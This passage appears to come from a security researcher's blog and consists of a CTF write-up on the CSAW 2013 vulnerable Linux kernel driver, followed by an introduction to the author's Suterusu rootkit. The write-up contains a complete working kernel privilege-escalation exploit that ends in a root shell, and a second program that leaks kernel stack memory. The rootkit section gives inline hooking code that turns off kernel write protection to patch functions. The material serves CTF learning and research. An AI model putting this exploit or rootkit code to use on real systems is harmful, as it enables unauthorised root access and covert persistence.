                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            cbuf->consumers[consumer_args.offset] = consumer_args.pid;

            break;
        }

        case CSAW_FREE_HANDLE:
        {
            struct free_args free_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&free_args, argp, sizeof(free_args)) )
                return -EFAULT;

            cbuf = find_cbuf(free_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            free_buf(cbuf);

            handles--;

            break;
        }

        case CSAW_GET_STATS:
        {
            struct csaw_stats csaw_stats;

            csaw_stats.clients = clients;
            csaw_stats.handles = handles;
            csaw_stats.bytes_read = bytes_read;
            csaw_stats.bytes_written = bytes_written;
            strcpy(csaw_stats.version, DRIVER_VERSION);

            if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
                return -EFAULT;

            break;
        }

        default:
            ret = -EINVAL;
            break;
    }

    return ret;
}

static ssize_t csaw_read ( struct file *file, char *buf, size_t count, loff_t *pos )
{
    char *stats;
    unsigned int to_read;
    unsigned int ret;

    stats = kmalloc(1024, GFP_KERNEL);
    if ( ! buf )
        return -ENOMEM;

    ret = snprintf(stats, 1024, "Active clients: %lu\nHandles allocated: %lu\nBytes read: %lu\nBytes written: %lu\n",
             clients, handles, bytes_read, bytes_written);

    if ( count < ret )
        to_read = count;
    else
        to_read = ret;

    if ( copy_to_user(buf, stats, to_read) )
    {
        kfree(stats);
        return -EFAULT;
    }

    kfree(stats);

    return 0;
}

static const struct file_operations csaw_fops = {
    owner:          THIS_MODULE,
    open:           csaw_open,
    release:        csaw_release,
    unlocked_ioctl: csaw_ioctl,
    read:           csaw_read,
};

static struct miscdevice csaw_miscdev = {
    name:   "csaw",
    fops:   &csaw_fops
};

static int __init lezzdoit ( void )
{
    misc_register(&csaw_miscdev);

    return 0;
}

static void __exit wereouttahurr ( void )
{
    misc_deregister(&csaw_miscdev);
}

module_init(lezzdoit);
module_exit(wereouttahurr);

MODULE_LICENSE("GPL");

Understanding the Code

The kernel module is meant to provide a shared buffer system between processes.  By interacting with the /dev/csaw interface, processes may do various things such as allocating a new buffer of arbitrary size, reading and writing to the buffer, and controlling which process IDs may operate on it.  The main point of interaction with the module is through the ioctl handler csaw_ioctl().

The CSAW_ALLOC_HANDLE command allocates a new buffer of size specified by the user and returns a handle.  A handle in this context is simply the buffer address XOR’d with a random 32-bit value.

Given a valid handle to an existing allocated buffer, the commands CSAW_READ_HANDLE and CSAW_WRITE_HANDLE allow the user to read and write the contents of the buffer.  Only process IDs authorized in the buffer’s consumers array may perform these operations, however.

Again, given a valid handle to an existing allocated buffer, the CSAW_GET_CONSUMER and CSAW_SET_CONSUMER commands allow only authorized processes to modify the buffer’s consumers array.

Finally, the CSAW_FREE_HANDLE command allows authorized consumers to free a given buffer.

An extra command CSAW_GET_STATS provides no direct functionality towards shared buffer management, but provides interesting debug information about the module.  Calling read() on the interface provides similar data.

Tracing the Vulnerable Code Path

Upon entry to csaw_ioctl(), the user controls the arguments cmd and arg, and thus the variable argp:

183 static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
184 {
185     int ret = 0;
186     unsigned long *argp = (unsigned long *)arg;
187 
188     switch ( cmd )
189     {

By providing the CSAW_SET_CONSUMER command, the following case is chosen:

299         case CSAW_SET_CONSUMER:
300         {
301             struct consumer_args consumer_args;
302             struct csaw_buf *cbuf;
303             unsigned int i, authorized = 0;
304 
305             if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
306                 return -EFAULT;
307 
308             cbuf = find_cbuf(consumer_args.handle);
309             if ( ! cbuf )
310                 return -EINVAL;

On line 305, user data is safely copied into the struct consumer_args:

91 struct consumer_args {
92     unsigned long handle;
93     unsigned long pid;
94     unsigned char offset;
95 };

On line 308, consumer_args.handle is verified to be a valid handle.  By previously allocating a new buffer via the CSAW_ALLOC_HANDLE command and passing the returned handle here, this check may be satisfied.

Next, the calling process is verified to be in the list of authorized consumers:

312             for ( i = 0; i < MAX_CONSUMERS; i++ )
313                 if ( current->pid == cbuf->consumers[i] )
314                     authorized = 1;
315 
316             if ( ! authorized )
317                 return -EPERM;

Since our current process is also the creator of the given handle, this check is satisfied automatically due to the consumers array being initialized with the current process ID.

Next, the consumers list is updated to reflect the desired edit:

319             cbuf->consumers[consumer_args.offset] = consumer_args.pid;

Line 319 is interesting for a variety of reasons.

At first sight, it appears to suffer from an unbounded array index vulnerability due to the user-controlled consumer_args.offset value being used directly as an array index without prior sanity check.  With such a vulnerability, it would be possible to write a user-controlled 32-bit value at an arbitrary offset from &cbuf->consumers.

However, upon further inspection of the struct definition, we find that consumer_args.offset is in fact of type unsigned char, meaning that its value is bounded to the range 0 to 255 instead of 0 to 2^32 - 1.

Looking at the definition of struct csaw_buf, we find that cbuf->consumers is appropriately sized and doesn’t allow a user to index outside of the array:

58 #define MAX_CONSUMERS 255
59 
60 struct csaw_buf {
61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

…Or does it?

Recall how C buffer allocation and array indexing works.  The consumers array is allocated with size 255 elements.  By providing the value 255 as an array index, we are not referencing the last element, but instead one past the last element since C begins counting at the 0 index.

This means there is an off-by-one vulnerability in this code, and we can write an arbitrary 32-bit value immediately after the end of consumers in our buffer’s csaw_buf struct (or leak the existing value via CSAW_GET_CONSUMER).
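The indexing argument can be checked in userspace without touching the driver. The following is a minimal sketch, assuming a Linux target where unsigned long and pointers have the same size and alignment. The names mock_csaw_buf, index_aliases_buf() and offset_in_bounds() are hypothetical, and the bounds check is one possible fix, not a patch from the challenge author.

```c
#include <stddef.h>

#define MAX_CONSUMERS 255

/* Userspace mock mirroring the field order of struct csaw_buf in the
 * listing above (struct list_head is replaced by two plain pointers). */
struct mock_csaw_buf {
    unsigned long consumers[MAX_CONSUMERS];
    char *buf;
    unsigned long size;
    unsigned long seed;
    void *list_next, *list_prev;
};

/* Returns 1 if consumers[offset] would land exactly on the buf member.
 * Computed with offsetof() so no out-of-bounds access is performed. */
int index_aliases_buf ( unsigned char offset )
{
    size_t slot = offsetof(struct mock_csaw_buf, consumers)
                + (size_t)offset * sizeof(unsigned long);

    return slot == offsetof(struct mock_csaw_buf, buf);
}

/* One possible fix (an assumption, not the challenge author's patch):
 * accept only indexes strictly below MAX_CONSUMERS. */
int offset_in_bounds ( unsigned char offset )
{
    return offset < MAX_CONSUMERS;
}
```

Index 255 is the only value an unsigned char can hold that escapes the array, which is why the bug gives control over buf and nothing beyond it.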

Leveraging the Vulnerability

The actual impact of this vulnerability depends on exactly what data follows the consumers array and what control is afforded by manipulating it.

Interestingly enough, we notice that a pointer buf immediately follows the array and may be fully controlled or leaked with our bug:

60 struct csaw_buf {
61     unsigned long consumers[MAX_CONSUMERS];
62     char *buf;
63     unsigned long size;
64     unsigned long seed;
65     struct list_head list;
66 };

This buf pointer stores the location of the heap buffer associated with an allocated handle. In normal operation, the module would read and write to this pointer when getting or setting the contents of a shared buffer.  Instead, we can abuse the functionality of CSAW_WRITE_HANDLE to achieve an exploitation primitive:

240         case CSAW_WRITE_HANDLE:
241         {
242             struct write_args write_args;
243             struct csaw_buf *cbuf;
244             unsigned int i, authorized = 0;
245             unsigned long to_write;
246 
247             if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
248                 return -EFAULT;
249 
250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;
253 
254             for ( i = 0; i < MAX_CONSUMERS; i++ )
255                 if ( current->pid == cbuf->consumers[i] )
256                     authorized = 1;
257 
258             if ( ! authorized )
259                 return -EPERM;
260 
261             to_write = min(write_args.size, cbuf->size);
262 
263             if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
264                 return -EFAULT;
265 
266             bytes_written += to_write;
267 
268             break;
269         }

On line 263, user data is presumably safely copied into kernelspace using the copy_from_user() function.  However, with our newfound control over cbuf->buf, we may now point this write operation at any arbitrary location in the kernel, resulting in an arbitrary write primitive.

Mirroring this functionality in CSAW_READ_HANDLE, we may also leverage the bug to leak memory at any arbitrary location in the kernel, resulting in an arbitrary read primitive.

Circumventing Additional Obstacles

Although we’ve identified a vector by which to leverage our off-by-one as arbitrary read and write primitives, there are still additional obstacles to overcome before continuing with our exploit.

Specifically, the call to find_cbuf() on line 250 of CSAW_WRITE_HANDLE is troublesome:

250             cbuf = find_cbuf(write_args.handle);
251             if ( ! cbuf )
252                 return -EINVAL;

Looking at the implementation of find_cbuf(), we find something interesting:

172 struct csaw_buf *find_cbuf ( unsigned long handle )
173 {
174     struct csaw_buf *cbuf;
175 
176     list_for_each_entry ( cbuf, &csaw_bufs, list )
177         if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
178             return cbuf;
179 
180     return NULL;
181 }

On lines 176-178, the function iterates through the linked list of allocated buffers and determines if the user-supplied handle matches that of an existing buffer.

Recall that handles are calculated as an XOR of the buffer address and 32 bits of randomness.  Thus, by corrupting an existing cbuf->buf address, all handle lookups for that buffer will subsequently fail since the calculation no longer matches our given handle.

Thus, in order to achieve our arbitrary read and write, we will need to first somehow leak the buffer’s seed value and recalculate the necessary handle to pass in.  Although seed can’t be directly leaked with the off-by-one bug, it is still possible to infer its value due to the nature of the calculation.

Thanks to the reversibility of the XOR operation, we can instead first leak the existing cbuf->buf value and XOR it with its given handle, obtaining the seed value as a result. Then, by XORing the new cbuf->buf value with the leaked seed, a new valid handle may be calculated and passed in, satisfying the validation function and successfully returning the manipulated buffer struct.
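The XOR bookkeeping is small enough to sketch on its own. This is a minimal illustration assuming the 32-bit target used in this challenge. The helper names recover_seed() and forge_handle() are hypothetical and appear nowhere in the driver.

```c
#include <stdint.h>

/* The module computes handle = buf ^ seed, so XORing the handle with the
 * leaked buf pointer yields the seed. */
uint32_t recover_seed ( uint32_t handle, uint32_t leaked_buf )
{
    return handle ^ leaked_buf;
}

/* Once cbuf->buf has been overwritten with target, find_cbuf() only
 * matches the handle derived from the new pointer value. */
uint32_t forge_handle ( uint32_t target, uint32_t seed )
{
    return target ^ seed;
}
```

Plugging in the values printed by the proof-of-concept run later in this post, recover_seed(0xda56b670, 0xf6a84200) gives 0x2cfef470, and forge_handle(0xc1ac8ed0, 0x2cfef470) gives 0xed527aa0.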

With all obstacles satisfied and exploit primitives realized, it’s time to write an exploit.

Achieving Local Privilege Escalation

While there are numerous techniques to achieve privilege escalation, my solution to the challenge uses the common technique of simply overwriting and triggering a kernel function pointer with the address of a payload in userspace.

Despite an effort to const-ify (make read-only) all possible function pointers in the kernel, certain design patterns still leave opportunity open for easy exploitation.  By overwriting the aio_read function pointer within the ptmx_fops struct associated with /dev/ptmx, it is possible to subsequently trigger the pointer with a call to readv().  In addition to my solution, this specific technique may also be observed in the Enlightenment framework written by Brad Spengler (spender).

After corrupting and triggering the function pointer, kernel execution is then transferred to the following payload in userspace:

127 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
128 typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
129 
130 unsigned long commit_creds;
131 unsigned long prepare_kernel_cred;
132 unsigned long *cleanup;
133 
134 int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
135 {
136     _commit_creds commit = (_commit_creds)commit_creds;
137     _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;
138 
139     *cleanup = 0;
140 
141     commit(prepare(0));
142 
143     return 0;
144 }

Kernel symbol resolution was enabled for this challenge, so determining the addresses of commit_creds, prepare_kernel_cred, and ptmx_fops was achieved simply by parsing the output of /proc/kallsyms.

Since the value of aio_read within ptmx_fops is by default 0, cleanup was relatively painless and only required writing the value 0 back to the corrupted pointer location.
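The exploit computes its write target as ptmx_fops + sizeof(void *) * 4. Here is a rough sketch of why that lands on aio_read, assuming the leading members of struct file_operations are ordered as in 3.x-era kernels (the layout differs in other kernel versions). The mock struct and aio_read_slot() are hypothetical names used only for illustration.

```c
#include <stddef.h>

/* Leading members of struct file_operations as laid out in 3.x-era
 * kernels (an assumption). Every member here is pointer-sized, so plain
 * void pointers are enough to reproduce the offsets. */
struct mock_file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
};

/* Address of the aio_read slot, given the address of a file_operations
 * struct such as ptmx_fops. */
unsigned long aio_read_slot ( unsigned long fops_addr )
{
    return fops_addr + offsetof(struct mock_file_operations, aio_read);
}
```

On the 32-bit target, four pointers occupy 16 bytes, so a ptmx_fops at 0xc1ac8ec0 puts the slot at 0xc1ac8ed0.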

Exploit


/*
 * CSAW 2013 Michael Coppola solution
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/utsname.h>

#define BUF_SIZE 0x100

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '\0';
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, "[+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

unsigned long commit_creds;
unsigned long prepare_kernel_cred;
unsigned long *cleanup;

int get_root ( void *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos )
{
    _commit_creds commit = (_commit_creds)commit_creds;
    _prepare_kernel_cred prepare = (_prepare_kernel_cred)prepare_kernel_cred;

    *cleanup = 0;

    commit(prepare(0));

    return 0;
}

int main ( int argc, char **argv )
{
    int fd, pfd, ret;
    unsigned long handle, buf, seed, target, new_handle, ptmx_fops;
    unsigned long payload[4];
    struct alloc_args alloc_args;
    struct write_args write_args;
    struct consumer_args consumer_args;
    struct iovec iov;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    pfd = open("/dev/ptmx", O_RDWR);
    if ( pfd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    commit_creds = get_kernel_sym("commit_creds");
    if ( ! commit_creds )
    {
        printf("[-] commit_creds symbol not found, aborting\n");
        exit(1);
    }

    prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");
    if ( ! prepare_kernel_cred )
    {
        printf("[-] prepare_kernel_cred symbol not found, aborting\n");
        exit(1);
    }

    ptmx_fops = get_kernel_sym("ptmx_fops");
    if ( ! ptmx_fops )
    {
        printf("[-] ptmx_fops symbol not found, aborting\n");
        exit(1);
    }

    memset(&alloc_args, 0, sizeof(alloc_args));
    alloc_args.size = BUF_SIZE;

    ret = ioctl(fd, CSAW_ALLOC_HANDLE, &alloc_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    handle = alloc_args.handle;

    printf("[+] Acquired handle: %lx\n", handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;

    ret = ioctl(fd, CSAW_GET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = consumer_args.pid;

    printf("[+] buf = %lx\n", buf);

    seed = buf ^ handle;

    printf("[+] seed = %lx\n", seed);

    target = ptmx_fops + sizeof(void *) * 4;

    printf("[+] target = %lx\n", target);

    new_handle = target ^ seed;

    printf("[+] new handle = %lx\n", new_handle);

    memset(&consumer_args, 0, sizeof(consumer_args));
    consumer_args.handle = handle;
    consumer_args.offset = 255;
    consumer_args.pid = target;

    ret = ioctl(fd, CSAW_SET_CONSUMER, &consumer_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    buf = (unsigned long)&get_root;

    memset(&write_args, 0, sizeof(write_args));
    write_args.handle = new_handle;
    write_args.size = sizeof(buf);
    write_args.in = &buf;

    ret = ioctl(fd, CSAW_WRITE_HANDLE, &write_args);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    printf("[+] Triggering payload\n");

    cleanup = (unsigned long *)target;

    iov.iov_base = &iov;
    iov.iov_len = sizeof(payload);
    ret = readv(pfd, &iov, 1);

    if ( getuid() )
    {
        printf("[-] Failed to get root\n");
        exit(1);
    }
    else
        printf("[+] Got root!\n");

    printf("[+] Enjoy your shell...\n");
    execl("/bin/sh", "sh", NULL);

    return 0;
}

Proof of Concept

csaw@gibson:~$ ./solution 
[+] Resolved commit_creds to 0xc1073be0
[+] Resolved prepare_kernel_cred to 0xc1073e10
[+] Resolved ptmx_fops to 0xc1ac8ec0
[+] Acquired handle: da56b670
[+] buf = f6a84200
[+] seed = 2cfef470
[+] target = c1ac8ed0
[+] new handle = ed527aa0
[+] Triggering payload
[+] Got root!
[+] Enjoy your shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#

Bonus Points

Although there were no actual bonus points to be awarded in the CTF, there is an additional information leak in the challenge that may have been utilized should symbol resolution be disabled (and you didn’t want to, ya know, use the arbitrary read).

Specifically, the CSAW_GET_STATS command contains the vulnerable code:

351         case CSAW_GET_STATS:
352         {
353             struct csaw_stats csaw_stats;
354 
355             csaw_stats.clients = clients;
356             csaw_stats.handles = handles;
357             csaw_stats.bytes_read = bytes_read;
358             csaw_stats.bytes_written = bytes_written;
359             strcpy(csaw_stats.version, DRIVER_VERSION);
360 
361             if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
362                 return -EFAULT;
363 
364             break;
365         }

The information leak manifests itself in the version member of csaw_stats, where uninitialized kstack data is returned to the user.  This vulnerability may be identified upon further inspection of the struct definition:

 47 #define DRIVER_VERSION "CSAW SUCKiT v1.3.37"
...
 97 struct csaw_stats {
 98     unsigned long clients;
 99     unsigned long handles;
100     unsigned long bytes_read;
101     unsigned long bytes_written;
102     char version[40];
103 };

Note how version is allocated with size 40, while the DRIVER_VERSION string being strcpy()‘d is only 20 bytes long (including the terminating null byte).
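The size mismatch is easy to reproduce in userspace. This is a small sketch in which a marker byte stands in for whatever stale data happens to be on the kernel stack. count_untouched_bytes() is a hypothetical helper name.

```c
#include <string.h>

#define DRIVER_VERSION "CSAW SUCKiT v1.3.37"
#define VERSION_LEN    40

/* Fills a 40-byte buffer with a marker, performs the same strcpy() as the
 * driver, and counts how many bytes still hold the marker afterwards. */
int count_untouched_bytes ( void )
{
    char version[VERSION_LEN];
    int i, untouched = 0;

    memset(version, 0xAA, sizeof(version));
    strcpy(version, DRIVER_VERSION);

    for ( i = 0; i < VERSION_LEN; i++ )
        if ( (unsigned char)version[i] == 0xAA )
            untouched++;

    return untouched;
}
```

The function returns 20: strcpy() writes 19 characters plus the terminating null byte and leaves the rest of the array alone. In the driver, zeroing the whole struct with memset() before filling it in would be one straightforward way to close the leak.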

The following code leaks out 20 bytes of uninitialized kstack data to userspace:


/*
 * CSAW 2013 Michael Coppola leak uninitialized kstack
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/utsname.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_GET_STATS      CSAW_IOCTL_BASE+7

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

int main ( int argc, char **argv )
{
    int fd, ret, i;
    struct csaw_stats csaw_stats;

    fd = open("/dev/csaw", O_RDONLY);
    if ( fd < 0 )
    {
        perror("open");
        exit(EXIT_FAILURE);
    }

    memset(&csaw_stats, 0, sizeof(csaw_stats));

    ret = ioctl(fd, CSAW_GET_STATS, &csaw_stats);
    if ( ret < 0 )
    {
        perror("ioctl");
        exit(EXIT_FAILURE);
    }

    for ( i = 0; i < 20; i++ )
        printf("%02hhx ", csaw_stats.version[20+i]);
    printf("\n");

    return 0;
}

And proof of concept:

csaw@gibson:~$ for i in {1..10}; do ./leak; done
00 ce 80 f6 14 00 00 00 28 00 00 00 30 79 62 b7 00 00 00 00 
40 c5 80 f6 14 00 00 00 28 00 00 00 30 39 6f b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 a9 68 b7 00 00 00 00 
c0 b8 82 f4 14 00 00 00 28 00 00 00 30 b9 66 b7 00 00 00 00 
00 c7 80 f6 14 00 00 00 28 00 00 00 30 b9 68 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 89 64 b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 29 67 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 69 6c b7 00 00 00 00 
c0 58 a6 f6 14 00 00 00 28 00 00 00 30 39 69 b7 00 00 00 00 
00 50 a6 f6 14 00 00 00 28 00 00 00 30 e9 65 b7 00 00 00 00 
csaw@gibson:~$

Depending on the uninitialized data returned, it’s possible to leak pointers which may be used to calculate the base of one’s own kstack.  Using this information in the absence of known targets for a write primitive, a calculated write may then be performed into the kstack to subsequently gain code execution.

This technique, known as “stackjacking,” was presented by Dan Rosenberg and Jon Oberheide in 2011 as a technique to exploit a Linux kernel hardened by the grsecurity patchset.
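As a rough sketch of the arithmetic involved, assuming 8 KiB kernel stacks (the usual THREAD_SIZE on 32-bit x86 kernels of this era, though it is configurable), a pointer into the stack can be rounded down to the stack base with a mask. The names le32() and kstack_base() are hypothetical, and the sample bytes are taken from the first leak line above purely as input; the output alone does not establish that this particular value points into the kernel stack.

```c
#include <stdint.h>

/* Assumption: 8 KiB kernel stacks, aligned to their own size. */
#define ASSUMED_THREAD_SIZE 8192u

/* Reassemble a little-endian 32-bit value from four leaked bytes. */
uint32_t le32 ( const unsigned char *p )
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Round a pointer into the stack down to the stack's base address. */
uint32_t kstack_base ( uint32_t ptr )
{
    return ptr & ~(ASSUMED_THREAD_SIZE - 1);
}
```

For the bytes 00 ce 80 f6, le32() yields 0xf680ce00 and kstack_base() rounds that down to 0xf680c000.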

Although I have written a modified version of my solution that utilizes stackjacking for local privilege escalation, I’ll leave its implementation as an exercise to the reader.

Summercon 2013: Hacking the Withings WS-30

This past weekend I presented Weighing in on Issues with “Cloud Scale” at Summercon 2013 (the title is totally a joke, btw). In the presentation, I talked about my experience reverse engineering and hacking the Withings WS-30 WiFi-enabled bathroom scale, a fun little embedded device running Thumb-2 code.

As mentioned during the talk, I’ve uploaded my slides, tools, and notes for download.  All of the tools I showed in the talk are fairly polished and ready for use in other projects.  There are also a good number of random crappy scripts that I used in one-off scenarios during the project but still may prove useful in some way.

I’ve included a copy of the WS-30 firmware (version 211) in the repo, as well as a copy with no header.  I’m also publishing my .idb so it may help others if they want to look at the code.  I’ve been annotating it for a number of months now so it should be fairly thorough.

If you have any feedback about the presentation or the project itself, let me know!

Slides: weighing-in-on-issues-with-cloud-scale.pdf

Tools/notes and everything else: https://github.com/mncoppola/ws30

Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Introduction

A number of months ago, I added a new project to GitHub showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick.  I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits.  The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx.  A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim.  I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself.  I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics.  Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.  Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine.  This can be observed by examining the following four functions:

  • hijack_start()
  • hijack_pause()
  • hijack_resume()
  • hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function.  HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode.  At this point, all function calls to the target function will redirect to our hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation.  The remaining hijack functions operate on this linked list.
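The trampoline bytes described above can be built in isolation. This is a minimal userspace sketch for 32-bit x86. build_push_ret() and HIJACK_SIZE_X86 are hypothetical names, and the bytes are stored one at a time so the result does not depend on the host's endianness or alignment rules.

```c
#include <stdint.h>

#define HIJACK_SIZE_X86 6  /* push imm32 (5 bytes) + ret (1 byte) */

/* Writes "push $addr; ret" into out. The 32-bit immediate is stored
 * little-endian, as x86 expects. */
void build_push_ret ( unsigned char out[HIJACK_SIZE_X86], uint32_t addr )
{
    out[0] = 0x68;                          /* push imm32 */
    out[1] = (unsigned char)(addr);
    out[2] = (unsigned char)(addr >> 8);
    out[3] = (unsigned char)(addr >> 16);
    out[4] = (unsigned char)(addr >> 24);
    out[5] = 0xc3;                          /* ret */
}
```

When the patched prologue executes, the push places the hook-with address on the stack and the ret immediately pops it into the instruction pointer, so no register is clobbered by the redirect.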

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
